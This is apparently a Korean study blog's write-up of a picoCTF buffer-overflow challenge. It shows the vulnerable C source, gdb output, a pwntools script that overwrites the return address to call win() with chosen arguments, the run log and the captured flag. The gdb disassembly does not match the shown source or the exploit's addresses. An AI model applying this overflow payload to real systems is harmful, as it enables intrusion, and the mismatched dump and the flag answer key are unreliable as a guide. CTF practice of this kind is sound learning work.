문제
문제파일 다운받기
이 폴더로 옮겨주기
코드 분석
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 100
#define FLAGSIZE 64
void win(unsigned int arg1, unsigned int arg2) {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("%s %s", "Please create 'flag.txt' in this directory with your",
"own debugging flag.\n");
exit(0);
}
fgets(buf,FLAGSIZE,f);
if (arg1 != 0xCAFEF00D)
return;
if (arg2 != 0xF00DF00D)
return;
printf(buf);
}
void vuln(){
char buf[BUFSIZE];
gets(buf);
puts(buf);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
gid_t gid = getegid();
setresgid(gid, gid, gid);
puts("Please enter your string: ");
vuln();
return 0;
}
gdb 실행
gdb vuln
info func
pwndbg> info func
All defined functions:
Non-debugging symbols:
0x00001000 _init
0x00001100 __cxa_finalize@plt
0x00001110 printf@plt
0x00001120 fflush@plt
0x00001130 gets@plt
0x00001140 fgets@plt
0x00001150 signal@plt
0x00001160 getegid@plt
0x00001170 strcpy@plt
0x00001180 puts@plt
0x00001190 exit@plt
0x000011a0 __libc_start_main@plt
0x000011b0 fopen@plt
0x000011c0 setresgid@plt
0x000011d0 _start
0x00001210 __x86.get_pc_thunk.bx
0x00001220 deregister_tm_clones
0x00001260 register_tm_clones
0x000012b0 __do_global_dtors_aux
0x00001300 frame_dummy
0x00001309 __x86.get_pc_thunk.dx
0x0000130d sigsegv_handler
0x00001353 vuln
0x00001382 main
0x0000149b __x86.get_pc_thunk.ax
0x000014a0 __libc_csu_init
0x00001510 __libc_csu_fini
0x00001515 __x86.get_pc_thunk.bp
0x0000151c _fini
disass vuln
pwndbg> disass vuln
Dump of assembler code for function vuln:
0x00001353 <+0>: endbr32
0x00001357 <+4>: push ebp
0x00001358 <+5>: mov ebp,esp
0x0000135a <+7>: push ebx
0x0000135b <+8>: sub esp,0x14
0x0000135e <+11>: call 0x149b <__x86.get_pc_thunk.ax>
0x00001363 <+16>: add eax,0x2c49
0x00001368 <+21>: sub esp,0x8
0x0000136b <+24>: push DWORD PTR [ebp+0x8]
0x0000136e <+27>: lea edx,[ebp-0x18]
0x00001371 <+30>: push edx
0x00001372 <+31>: mov ebx,eax
0x00001374 <+33>: call 0x1170 <strcpy@plt>
0x00001379 <+38>: add esp,0x10
0x0000137c <+41>: nop
0x0000137d <+42>: mov ebx,DWORD PTR [ebp-0x4]
0x00001380 <+45>: leave
0x00001381 <+46>: ret
End of assembler dump.
exploit
from pwn import *
host = 'saturn.picoctf.net' #호스트 주소
port = 51463 #포트 넘버(사바사)
win_addr = 0x08049296
valid_addr = 0x08049372 #존재하는 함수 주소(여기선 main()의 주소)
payload = b'A'*112 #buf ~ ebp 크기
payload += p32(win_addr) #gets()의 ret -> win() 호출
payload += p32(valid_addr) #win()의 ret
payload += p32(0xcafef00d) #win()의 arg1값
payload += p32(0xf00df00d) #win()의 arg2값
p = remote(host, port)
p.sendline(payload)
p.interactive()
익스플로잇 코드 작성할 파일 만들기
vi [파일명]
코드 작성하기
:wq
저장하고 나가기
python3 파일명
실행하기
(venv) dada@LAPTOP-OTMC93DN:~/Interlude_System_Study$ python3 exploit2
[+] Opening connection to saturn.picoctf.net on port 51463: Done
[*] Switching to interactive mode
Please enter your string:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x96\x92\xf0\xfe\xca3\x04\x08
picoCTF{argum3nt5_4_d4yZ_59cd5643}Please enter your string:
[*] Got EOF while reading in interactive
플래그
picoCTF{argum3nt5_4_d4yZ_59cd5643}
성공이다.
'System Hacking > 인터루드 스터디' 카테고리의 다른 글
| 260514 [picoCTF] format string 1 (0) | 2026.05.14 |
|---|---|
| 260514 [picoCTF] format string 0 (0) | 2026.05.14 |
| [picoCTF] buffer overflow 1 (0) | 2026.04.02 |
| [picoCTF:] buffer overflow 0 (0) | 2026.04.02 |
| [pwnable.kr] bof (0) | 2026.03.26 |